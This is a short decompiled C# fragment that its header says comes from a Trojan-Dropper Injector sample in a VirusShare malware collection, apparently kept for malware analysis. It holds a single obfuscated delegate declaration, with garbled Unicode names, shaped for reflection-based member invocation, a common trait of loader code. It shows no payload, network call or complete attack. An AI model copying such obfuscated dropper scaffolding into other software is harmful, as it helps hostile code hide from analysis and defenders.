// Decompiled with JetBrains decompiler // Type: �൷璬�ᘒ⻚豝 // Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System.Reflection; using System.Runtime.InteropServices; internal delegate object \uFFFD\uF6F3\u0D77璬\uFFFDᘒ\u2EDA豝( [In] object obj0, string _param2, BindingFlags _param3, Binder _param4, object _param5, object[] _param6);